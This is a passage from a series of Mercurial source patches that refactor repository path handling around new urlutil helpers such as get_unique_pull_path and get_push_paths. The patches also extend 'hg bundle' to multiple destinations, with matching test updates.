+++ b/tests/test-exchange-multi-source.t @@ -130,6 +130,46 @@ $ cp -R ./branch-E ./branch-E-push $ cp -R ./branch-G ./branch-G-push $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push + comparing with ./branch-E-push + searching for changes + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + | o changeset: 6:c521a06b234b + | | user: test + | | date: Thu Jan 01 00:00:00 1970 +0000 + | | summary: G + | | + | o changeset: 5:2f3a4c5c1417 + | parent: 1:27547f69f254 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: F + | + | o changeset: 4:a603bfb5a83e + | | user: test + | | date: Thu Jan 01 00:00:00 1970 +0000 + | | summary: E + | | + | o changeset: 3:b3325c91a4d9 + |/ user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: D + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push pushing to ./branch-E-push searching for changes @@ -291,6 +331,26 @@ $ cp -R ./branch-E ./branch-E-push $ cp -R ./branch-G ./branch-G-push $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default + comparing with ./branch-E-push + searching for changes + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + no changes found + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default pushing to ./branch-E-push searching for changes @@ -349,6 +409,26 @@ $ cp -R ./branch-E ./branch-E-push $ cp -R ./branch-G ./branch-G-push $ cp -R ./branch-H ./branch-H-push + $ hg out -G -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default + comparing with ./branch-G-push + searching for changes + comparing with ./branch-H-push + searching for changes + no changes found + comparing with ./branch-E-push + searching for changes + o changeset: 7:40faebb2ec45 + | tag: tip + | parent: 2:f838bfaca5c7 + | user: test + | date: Thu Jan 01 00:00:00 1970 +0000 + | summary: H + | + o changeset: 2:f838bfaca5c7 + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: C + $ hg push --force -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default pushing to ./branch-G-push searching for changes # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618359255 -7200 # Wed Apr 14 02:14:15 2021 +0200 # Node ID dec31caf5fd68210233a672f8efc6537f684f039 # Parent d4e4ccb75f99f24baa5912885d9360dd5e87cda3 incoming: use `urlutil.get_pull_paths` Lets use the new method to increase code reuse. However I did not implement support for multiple source yet. It would be possible create multiple temporary bundle, but that is a bit too much work outside of my current route to make the detour. Differential Revision: https://phab.mercurial-scm.org/D10392 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4311,19 +4311,20 @@ cmdutil.check_incompatible_arguments(opts, b'subrepos', [b'bundle']) if opts.get(b'bookmarks'): - source, branches = urlutil.parseurl( - ui.expandpath(source), opts.get(b'branch') - ) - other = hg.peer(repo, opts, source) - try: - if b'bookmarks' not in other.listkeys(b'namespaces'): - ui.warn(_(b"remote doesn't support bookmarks\n")) - return 0 - ui.pager(b'incoming') - ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) - return bookmarks.incoming(ui, repo, other) - finally: - other.close() + srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch')) + for source, branches in srcs: + other = hg.peer(repo, opts, source) + try: + if b'bookmarks' not in other.listkeys(b'namespaces'): + ui.warn(_(b"remote doesn't support bookmarks\n")) + return 0 + ui.pager(b'incoming') + ui.status( + _(b'comparing with %s\n') % urlutil.hidepassword(source) + ) + return bookmarks.incoming(ui, repo, other) + finally: + other.close() repo._subtoppath = ui.expandpath(source) try: diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1263,9 +1263,13 @@ (remoterepo, incomingchangesetlist, displayer) parameters, and is supposed to contain only code that can't be unified. """ - source, branches = urlutil.parseurl( - ui.expandpath(source), opts.get(b'branch') - ) + srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch')) + srcs = list(srcs) + if len(srcs) != 1: + msg = _('for now, incoming supports only a single source, %d provided') + msg %= len(srcs) + raise error.Abort(msg) + source, branches = srcs[0] other = peer(repo, opts, source) cleanupfn = other.close try: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618161534 -7200 # Sun Apr 11 19:18:54 2021 +0200 # Node ID 9519312ecd81fc874a03428cae2515ccf139f53f # Parent dec31caf5fd68210233a672f8efc6537f684f039 outgoing: use `get_push_paths` in the revset too The revsets now use the same code as everyone and is ready for entry in `[paths]` pointing to multiple entries. Differential Revision: https://phab.mercurial-scm.org/D10393 diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1855,30 +1855,29 @@ dest = ( l and getstring(l[0], _(b"outgoing requires a repository path")) or b'' ) - if not dest: + if dest: # ui.getpath() explicitly tests for None, not just a boolean - dest = None - path = repo.ui.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - dest = path.pushloc or path.loc - branches = path.branch, [] - - revs, checkout = hg.addbranchrevs(repo, repo, branches, []) - if revs: - revs = [repo.lookup(rev) for rev in revs] - other = hg.peer(repo, {}, dest) - try: - repo.ui.pushbuffer() - outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs) - repo.ui.popbuffer() - finally: - other.close() + dests = [dest] + else: + dests = [] + missing = set() + for path in urlutil.get_push_paths(repo, repo.ui, dests): + dest = path.pushloc or path.loc + branches = path.branch, [] + + revs, checkout = hg.addbranchrevs(repo, repo, branches, []) + if revs: + revs = [repo.lookup(rev) for rev in revs] + other = hg.peer(repo, {}, dest) + try: + repo.ui.pushbuffer() + outgoing = discovery.findcommonoutgoing(repo, other, onlyheads=revs) + repo.ui.popbuffer() + finally: + other.close() + missing.update(outgoing.missing) cl = repo.changelog - o = {cl.rev(r) for r in outgoing.missing} + o = {cl.rev(r) for r in missing} return subset & o # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618389340 -7200 # Wed Apr 14 10:35:40 2021 +0200 # Node ID ebb13f9a9ba8c2e43a7cc927333097864b9bb69d # Parent 9519312ecd81fc874a03428cae2515ccf139f53f urlutil: add a `get_clone_path` function We add a new function with a semantic focussed on `clone` operation (so without an existing repository). I am not certain the return type is the best, but this is what we need for now. Once all caller are migrated we might start thinking about that the API should be. For now that will do. Differential Revision: https://phab.mercurial-scm.org/D10401 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -672,8 +672,8 @@ """ if isinstance(source, bytes): - origsource = ui.expandpath(source) - source, branches = urlutil.parseurl(origsource, branch) + src = urlutil.get_clone_path(ui, source, branch) + origsource, source, branches = src srcpeer = peer(ui, peeropts, source) else: srcpeer = source.peer() # in case we were called with a localrepo diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -471,6 +471,13 @@ yield parseurl(url, default_branches) +def get_clone_path(ui, source, default_branches=()): + """return the `(origsource, path, branch)` selected as clone source""" + url = ui.expandpath(source) + path, branch = parseurl(url, default_branches) + return url, path, branch + + def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' u = url(path) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618390291 -7200 # Wed Apr 14 10:51:31 2021 +0200 # Node ID ae4c0f279282cc8838555fef56eaf615df2f6b3b # Parent ebb13f9a9ba8c2e43a7cc927333097864b9bb69d mq: use the new `get_clone_path` to get the remote url We stop using `ui.expandpath` to use a function with a more defined semantic. This will help us to make it an option to point [paths] entry to multiple destination. Differential Revision: https://phab.mercurial-scm.org/D10402 diff --git a/hgext/mq.py b/hgext/mq.py --- a/hgext/mq.py +++ b/hgext/mq.py @@ -2863,11 +2863,12 @@ # main repo (destination and sources) if dest is None: dest = hg.defaultdest(source) - sr = hg.peer(ui, opts, ui.expandpath(source)) + __, source_path, __ = urlutil.get_clone_path(ui, source) + sr = hg.peer(ui, opts, source_path) # patches repo (source only) if opts.get(b'patches'): - patchespath = ui.expandpath(opts.get(b'patches')) + __, patchespath, __ = urlutil.get_clone_path(ui, opts.get(b'patches')) else: patchespath = patchdir(sr) try: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618391754 -7200 # Wed Apr 14 11:15:54 2021 +0200 # Node ID 1998a8311c4873d2e3ee6290f903ee0e680ca82e # Parent ae4c0f279282cc8838555fef56eaf615df2f6b3b urlutil: add a new `get_unique_pull_path` This function is dedicated to call that needs a single destination. Currently most caller actually need that since few actually support multiple destinations (the most importants `hg push` and `hg outgoing` do). So having a clear API point for that will be important when the time comes to have a single `[paths]` alias resolving to multiple urls. Differential Revision: https://phab.mercurial-scm.org/D10403 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -471,6 +471,22 @@ yield parseurl(url, default_branches) +def get_unique_pull_path(action, repo, ui, source=None, default_branches=()): + """return a unique `(path, branch)` or abort if multiple are found + + This is useful for command and action that does not support multiple + destination (yet). + + Note that for now, we cannot get multiple destination so this function is "trivial". + + The `action` parameter will be used for the error message. + """ + if source is None: + source = b'default' + url = ui.expandpath(source) + return parseurl(url, default_branches) + + def get_clone_path(ui, source, default_branches=()): """return the `(origsource, path, branch)` selected as clone source""" url = ui.expandpath(source) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618391928 -7200 # Wed Apr 14 11:18:48 2021 +0200 # Node ID 8e6911426b884a744138b1d47d0abded2079472a # Parent 1998a8311c4873d2e3ee6290f903ee0e680ca82e narrow: use `get_unique_pull_path` The narrow's `tracked` command does not support multiple destination, lets use the dedicated API then. Differential Revision: https://phab.mercurial-scm.org/D10404 diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -593,8 +593,8 @@ # Find the revisions we have in common with the remote. These will # be used for finding local-only changes for narrowing. They will # also define the set of revisions to update for widening. - remotepath = ui.expandpath(remotepath or b'default') - url, branches = urlutil.parseurl(remotepath) + r = urlutil.get_unique_pull_path(b'tracked', repo, ui, remotepath) + url, branches = r ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) remote = hg.peer(repo, opts, url) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618392649 -7200 # Wed Apr 14 11:30:49 2021 +0200 # Node ID a48f15f1c1784ad4f8277f8f8af32d4bcd13664f # Parent 8e6911426b884a744138b1d47d0abded2079472a patchbomb: use `get_unique_pull_path` The patchbomb code does not support multiple destinations yet. It would not be too hard to implemented since `hg outgoing` does. However that is a bit too much of a detour right now. In addition that kind of "select outgoing changesets for processing" code exist for various commands so the best would be to factor it out later. Let us use the dedicated API until this is solved. This comes with a small output change in the test that I find more accurate. So I kept it. Differential Revision: https://phab.mercurial-scm.org/D10405 diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -530,9 +530,9 @@ def _getoutgoing(repo, dest, revs): '''Return the revisions present locally but not in dest''' ui = repo.ui - url = ui.expandpath(dest or b'default-push', dest or b'default') - url = urlutil.parseurl(url)[0] - ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) + paths = urlutil.get_push_paths(repo, ui, [dest]) + safe_paths = [urlutil.hidepassword(p.rawloc) for p in paths] + ui.status(_(b'comparing with %s\n') % b','.join(safe_paths)) revs = [r for r in revs if r >= 0] if not revs: diff --git a/tests/test-patchbomb.t b/tests/test-patchbomb.t --- a/tests/test-patchbomb.t +++ b/tests/test-patchbomb.t @@ -2868,7 +2868,7 @@ dest#branch URIs: $ hg email --date '1980-1-1 0:1' -n -t foo -s test -o ../t#test - comparing with ../t + comparing with ../t#test From [test]: test this patch series consists of 1 patches. # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618393090 -7200 # Wed Apr 14 11:38:10 2021 +0200 # Node ID b133154f1e7ba2fbb5a07df6cc1a4671dac1e275 # Parent a48f15f1c1784ad4f8277f8f8af32d4bcd13664f fetch: use `get_unique_pull_path` to retrieve the path The fetch command does not support multiple destination, so we use the new dedicated API for that. Differential Revision: https://phab.mercurial-scm.org/D10406 diff --git a/hgext/fetch.py b/hgext/fetch.py --- a/hgext/fetch.py +++ b/hgext/fetch.py @@ -109,11 +109,9 @@ ) ) - other = hg.peer(repo, opts, ui.expandpath(source)) - ui.status( - _(b'pulling from %s\n') - % urlutil.hidepassword(ui.expandpath(source)) - ) + path = urlutil.get_unique_pull_path(b'fetch', repo, ui, source)[0] + other = hg.peer(repo, opts, path) + ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(path)) revs = None if opts[b'rev']: try: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618394240 -7200 # Wed Apr 14 11:57:20 2021 +0200 # Node ID 368294967c9532721c9b448fbe419bdb832e9d88 # Parent b133154f1e7ba2fbb5a07df6cc1a4671dac1e275 urlutil: add a new `get_unique_push_path` This function is dedicated to call that needs a single destination. Currently most caller actually need that since few actually support multiple destinations (the most importants `hg push` and `hg outgoing` do). So having a clear API point for that will be important when the time comes to have a single `[paths]` alias resolving to multiple urls. Differential Revision: https://phab.mercurial-scm.org/D10407 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -471,6 +471,25 @@ yield parseurl(url, default_branches) +def get_unique_push_path(action, repo, ui, dest=None): + """return a unique `path` or abort if multiple are found + + This is useful for command and action that does not support multiple + destination (yet). + + Note that for now, we cannot get multiple destination so this function is "trivial". + + The `action` parameter will be used for the error message. + """ + if dest is None: + dests = [] + else: + dests = [dest] + dests = list(get_push_paths(repo, ui, dests)) + assert len(dests) == 1 + return dests[0] + + def get_unique_pull_path(action, repo, ui, source=None, default_branches=()): """return a unique `(path, branch)` or abort if multiple are found # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618394487 -7200 # Wed Apr 14 12:01:27 2021 +0200 # Node ID d689d48527ea597345ca204ad23d65e4165a0cbd # Parent 368294967c9532721c9b448fbe419bdb832e9d88 histedit: use `get_unique_push_path` Same as for `pathbomb`, this code does not support multiple destinations yet. It might in the future, probably with code put in common with patchwork, but for now lets use the dedicated API. Differential Revision: https://phab.mercurial-scm.org/D10408 diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -1041,11 +1041,12 @@ Used by initialization code""" if opts is None: opts = {} - dest = ui.expandpath(remote or b'default-push', remote or b'default') - dest, branches = urlutil.parseurl(dest, None)[:2] + path = urlutil.get_unique_push_path(b'histedit', repo, ui, remote) + dest = path.pushloc or path.loc + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) - revs, checkout = hg.addbranchrevs(repo, repo, branches, None) + revs, checkout = hg.addbranchrevs(repo, repo, (path.branch, []), None) other = hg.peer(repo, opts, dest) if revs: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618396184 -7200 # Wed Apr 14 12:29:44 2021 +0200 # Node ID b5e7cdb93abc3e26d1d80934d32f26362edecde2 # Parent d689d48527ea597345ca204ad23d65e4165a0cbd relink: use `get_unique_pull_path` The code does not support multiple destination and will probably never do so. So lets use the dedicated API for this case. Differential Revision: https://phab.mercurial-scm.org/D10409 diff --git a/hgext/relink.py b/hgext/relink.py --- a/hgext/relink.py +++ b/hgext/relink.py @@ -19,7 +19,10 @@ registrar, util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) cmdtable = {} command = registrar.command(cmdtable) @@ -62,10 +65,11 @@ util, b'samedevice' ): raise error.Abort(_(b'hardlinks are not supported on this system')) - src = hg.repository( - repo.baseui, - ui.expandpath(origin or b'default-relink', origin or b'default'), - ) + + if origin is None and b'default-relink' in ui.paths: + origin = b'default-relink' + path, __ = urlutil.get_unique_pull_path(b'relink', repo, ui, origin) + src = hg.repository(repo.baseui, path) ui.status(_(b'relinking %s to %s\n') % (src.store.path, repo.store.path)) if repo.root == src.root: ui.status(_(b'there is nothing to relink\n')) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618562812 -7200 # Fri Apr 16 10:46:52 2021 +0200 # Node ID 30ee1224b9a2c0efcf975e3d4b1e2822ca9aa3da # Parent b5e7cdb93abc3e26d1d80934d32f26362edecde2 infinitepush: use `get_unique_pull_path` The extension does not support multiple destination (yet). Differential Revision: https://phab.mercurial-scm.org/D10456 diff --git a/hgext/infinitepush/__init__.py b/hgext/infinitepush/__init__.py --- a/hgext/infinitepush/__init__.py +++ b/hgext/infinitepush/__init__.py @@ -684,8 +684,12 @@ def _pull(orig, ui, repo, source=b"default", **opts): opts = pycompat.byteskwargs(opts) # Copy paste from `pull` command - source, branches = urlutil.parseurl( - ui.expandpath(source), opts.get(b'branch') + source, branches = urlutil.get_unique_pull_path( + b"infinite-push's pull", + repo, + ui, + source, + default_branches=opts.get(b'branch'), ) scratchbookmarks = {} # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618562816 -7200 # Fri Apr 16 10:46:56 2021 +0200 # Node ID 0428e555acb78c5cb2d74b2b828db7f4cadd62a3 # Parent 30ee1224b9a2c0efcf975e3d4b1e2822ca9aa3da transplant: use `get_unique_pull_path` The command does not support multiple destination (yet). Differential Revision: https://phab.mercurial-scm.org/D10410 diff --git a/hgext/transplant.py b/hgext/transplant.py --- a/hgext/transplant.py +++ b/hgext/transplant.py @@ -47,6 +47,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) @@ -818,7 +819,8 @@ sourcerepo = opts.get(b'source') if sourcerepo: - peer = hg.peer(repo, opts, ui.expandpath(sourcerepo)) + u = urlutil.get_unique_pull_path(b'transplant', repo, ui, sourcerepo)[0] + peer = hg.peer(repo, opts, u) heads = pycompat.maplist(peer.lookup, opts.get(b'branch', ())) target = set(heads) for r in revs: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618397875 -7200 # Wed Apr 14 12:57:55 2021 +0200 # Node ID c1749dd31cdfee20926465d57d4a5a40a2fb2ebc # Parent 0428e555acb78c5cb2d74b2b828db7f4cadd62a3 remotefilelog: use the right expandpath in to expand `~` Given the context where path is most likely a file system path, I suspect that the initial author confused ui.expandpath and util.expandpath (a proxy for os.path.expanduser and co) Differential Revision: https://phab.mercurial-scm.org/D10411 diff --git a/hgext/remotefilelog/__init__.py b/hgext/remotefilelog/__init__.py --- a/hgext/remotefilelog/__init__.py +++ b/hgext/remotefilelog/__init__.py @@ -888,7 +888,7 @@ progress.update(count) count += 1 try: - path = ui.expandpath(os.path.normpath(path)) + path = util.expandpath(os.path.normpath(path)) except TypeError as e: ui.warn(_(b"warning: malformed path: %r:%s\n") % (path, e)) traceback.print_exc() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618398369 -7200 # Wed Apr 14 13:06:09 2021 +0200 # Node ID b6b696442a4dcc34c0b8ec68446f394d7f3e4481 # Parent c1749dd31cdfee20926465d57d4a5a40a2fb2ebc fastannotate: use `get_unique_pull_path` The code does not support multiple destination yet, so lets move it to the dedicated API. Differential Revision: https://phab.mercurial-scm.org/D10412 diff --git a/hgext/fastannotate/protocol.py b/hgext/fastannotate/protocol.py --- a/hgext/fastannotate/protocol.py +++ b/hgext/fastannotate/protocol.py @@ -20,6 +20,9 @@ wireprotov1peer, wireprotov1server, ) +from mercurial.utils import ( + urlutil, +) from . import context # common @@ -151,9 +154,9 @@ def annotatepeer(repo): ui = repo.ui - remotepath = ui.expandpath( - ui.config(b'fastannotate', b'remotepath', b'default') - ) + remotedest = ui.config(b'fastannotate', b'remotepath', b'default') + r = urlutil.get_unique_pull_path(b'fastannotate', repo, ui, remotedest) + remotepath = r[0] peer = hg.peer(ui, {}, remotepath) try: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618403713 -7200 # Wed Apr 14 14:35:13 2021 +0200 # Node ID 3f29765e0d9520135c9712ff48eff061c545cd6e # Parent b6b696442a4dcc34c0b8ec68446f394d7f3e4481 lfs: use the new APIs The part of the lfs store that requires a destination cannot operate on multiple destination (yet). So we move them to the dedicated APIs. Differential Revision: https://phab.mercurial-scm.org/D10413 diff --git a/hgext/largefiles/storefactory.py b/hgext/largefiles/storefactory.py --- a/hgext/largefiles/storefactory.py +++ b/hgext/largefiles/storefactory.py @@ -22,6 +22,7 @@ wirestore, ) + # During clone this function is passed the src's ui object # but it needs the dest's ui object so it can read out of # the config file. Use repo.ui instead. @@ -31,19 +32,22 @@ if not remote: lfpullsource = getattr(repo, 'lfpullsource', None) - if lfpullsource: - path = ui.expandpath(lfpullsource) - elif put: - path = ui.expandpath(b'default-push', b'default') + if put: + path = urlutil.get_unique_push_path( + b'lfpullsource', repo, ui, lfpullsource + ) else: - path = ui.expandpath(b'default') + path, _branches = urlutil.get_unique_pull_path( + b'lfpullsource', repo, ui, lfpullsource + ) - # ui.expandpath() leaves 'default-push' and 'default' alone if - # they cannot be expanded: fallback to the empty string, - # meaning the current directory. + # XXX we should not explicitly pass b'default', as this will result in + # b'default' being returned if no `paths.default` was defined. We + # should explicitely handle the lack of value instead. if repo is None: - path = ui.expandpath(b'default') - path, _branches = urlutil.parseurl(path) + path, _branches = urlutil.get_unique_pull_path( + b'lfs', repo, ui, b'default' + ) remote = hg.peer(repo or ui, {}, path) elif path == b'default-push' or path == b'default': remote = repo # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618412540 -7200 # Wed Apr 14 17:02:20 2021 +0200 # Node ID 946db89607c8802873c5a4457d07a937c316ee41 # Parent 3f29765e0d9520135c9712ff48eff061c545cd6e bundle: support multiple destinations `hg outgoing` and `hg push` now support multiple destination. We do the same for `hg bundle`. Various other commands needs this kind of behavior and it would be create to factor this code out for their usage. However this is an adventure for another time. They are some minor change to the tests (in addition to the new test for the feature): * one because I updated a message to plurals, * another one because the error changed, and I actually find it clearer. Differential Revision: https://phab.mercurial-scm.org/D10414 diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -382,7 +382,10 @@ if btype: opts['type'] = btype try: - commands.bundle(ui, repo, tmpfn, dest, **opts) + dests = [] + if dest: + dests = [dest] + commands.bundle(ui, repo, tmpfn, *dests, **opts) return util.readfile(tmpfn) finally: try: diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1531,10 +1531,10 @@ ), ] + remoteopts, - _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... FILE [DEST]'), + _(b'[-f] [-t BUNDLESPEC] [-a] [-r REV]... [--base REV]... FILE [DEST]...'), helpcategory=command.CATEGORY_IMPORT_EXPORT, ) -def bundle(ui, repo, fname, dest=None, **opts): +def bundle(ui, repo, fname, *dests, **opts): """create a bundle file Generate a bundle file containing data to be transferred to another @@ -1545,7 +1545,7 @@ all the nodes you specify with --base parameters. Otherwise, hg will assume the repository has all the nodes in destination, or default-push/default if no destination is specified, where destination - is the repository you provide through DEST option. + is the repositories you provide through DEST option. You can change bundle format with the -t/--type option. See :hg:`help bundlespec` for documentation on this format. By default, @@ -1590,9 +1590,9 @@ ) if opts.get(b'all'): - if dest: + if dests: raise error.InputError( - _(b"--all is incompatible with specifying a destination") + _(b"--all is incompatible with specifying destinations") ) if opts.get(b'base'): ui.warn(_(b"ignoring --base because --all was specified\n")) @@ -1605,31 +1605,54 @@ ) if base: - if dest: + if dests: raise error.InputError( - _(b"--base is incompatible with specifying a destination") + _(b"--base is incompatible with specifying destinations") ) common = [repo[rev].node() for rev in base] heads = [repo[r].node() for r in revs] if revs else None outgoing = discovery.outgoing(repo, common, heads) + missing = outgoing.missing + excluded = outgoing.excluded else: - dest = ui.expandpath(dest or b'default-push', dest or b'default') - dest, branches = urlutil.parseurl(dest, opts.get(b'branch')) - other = hg.peer(repo, opts, dest) - revs = [repo[r].hex() for r in revs] - revs, checkout = hg.addbranchrevs(repo, repo, branches, revs) - heads = revs and pycompat.maplist(repo.lookup, revs) or revs - outgoing = discovery.findcommonoutgoing( - repo, - other, - onlyheads=heads, - force=opts.get(b'force'), - portable=True, + missing = set() + excluded = set() + for path in urlutil.get_push_paths(repo, ui, dests): + other = hg.peer(repo, opts, path.rawloc) + if revs is not None: + hex_revs = [repo[r].hex() for r in revs] + else: + hex_revs = None + branches = (path.branch, []) + head_revs, checkout = hg.addbranchrevs( + repo, repo, branches, hex_revs + ) + heads = ( + head_revs + and pycompat.maplist(repo.lookup, head_revs) + or head_revs + ) + outgoing = discovery.findcommonoutgoing( + repo, + other, + onlyheads=heads, + force=opts.get(b'force'), + portable=True, + ) + missing.update(outgoing.missing) + excluded.update(outgoing.excluded) + + if not missing: + scmutil.nochangesfound(ui, repo, not base and excluded) + return 1 + + if heads: + outgoing = discovery.outgoing( + repo, missingroots=missing, ancestorsof=heads ) - - if not outgoing.missing: - scmutil.nochangesfound(ui, repo, not base and outgoing.excluded) - return 1 + else: + outgoing = discovery.outgoing(repo, missingroots=missing) + outgoing.excluded = sorted(excluded) if cgversion == b'01': # bundle1 bversion = b'HG10' + bundlespec.wirecompression diff --git a/tests/test-bundle-r.t b/tests/test-bundle-r.t --- a/tests/test-bundle-r.t +++ b/tests/test-bundle-r.t @@ -171,14 +171,15 @@ should fail $ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg test-3 - abort: --base is incompatible with specifying a destination + abort: --base is incompatible with specifying destinations [10] $ hg -R test bundle -a -r tip test-bundle-branch1.hg test-3 - abort: --all is incompatible with specifying a destination + abort: --all is incompatible with specifying destinations [10] $ hg -R test bundle -r tip test-bundle-branch1.hg - abort: repository default-push not found - [255] + config error: default repository not configured! + (see 'hg help config.paths') + [30] $ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg 2 changesets found diff --git a/tests/test-exchange-multi-source.t b/tests/test-exchange-multi-source.t --- a/tests/test-exchange-multi-source.t +++ b/tests/test-exchange-multi-source.t @@ -170,6 +170,11 @@ date: Thu Jan 01 00:00:00 1970 +0000 summary: C + $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push + searching for changes + searching for changes + searching for changes + 6 changesets found $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push pushing to ./branch-E-push searching for changes @@ -351,6 +356,11 @@ date: Thu Jan 01 00:00:00 1970 +0000 summary: C + $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push --rev default + searching for changes + searching for changes + searching for changes + 2 changesets found $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default pushing to ./branch-E-push searching for changes @@ -429,6 +439,11 @@ date: Thu Jan 01 00:00:00 1970 +0000 summary: C + $ hg bundle -R test-repo-bare bundle.hg ./branch-G-push ./branch-H-push ./branch-E-push --rev default + searching for changes + searching for changes + searching for changes + 2 changesets found $ hg push --force -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default pushing to ./branch-G-push searching for changes # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618414167 -7200 # Wed Apr 14 17:29:27 2021 +0200 # Node ID 3800a6aafb6ff339edd4c347b6d2d84904e2c3b1 # Parent 946db89607c8802873c5a4457d07a937c316ee41 identify: use `get_unique_pull_path` The command only support a single destination. We use the associated API. Differential Revision: https://phab.mercurial-scm.org/D10415 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -3864,7 +3864,9 @@ peer = None try: if source: - source, branches = urlutil.parseurl(ui.expandpath(source)) + source, branches = urlutil.get_unique_pull_path( + b'identify', repo, ui, source + ) # only pass ui when no repo peer = hg.peer(repo or ui, opts, source) repo = peer.local() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618414862 -7200 # Wed Apr 14 17:41:02 2021 +0200 # Node ID 279df499511e90bafed58f25ca56e0191efbf867 # Parent 3800a6aafb6ff339edd4c347b6d2d84904e2c3b1 incoming: kill the `repo._subtoppath =` hack We do the same as for `hg outgoing`, instead of relying on implicit passing value by monkey punching them onto the repo object, we pass equivalent information by argument to the proper function. This is way cleaner. Differential Revision: https://phab.mercurial-scm.org/D10416 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4351,11 +4351,7 @@ finally: other.close() - repo._subtoppath = ui.expandpath(source) - try: - return hg.incoming(ui, 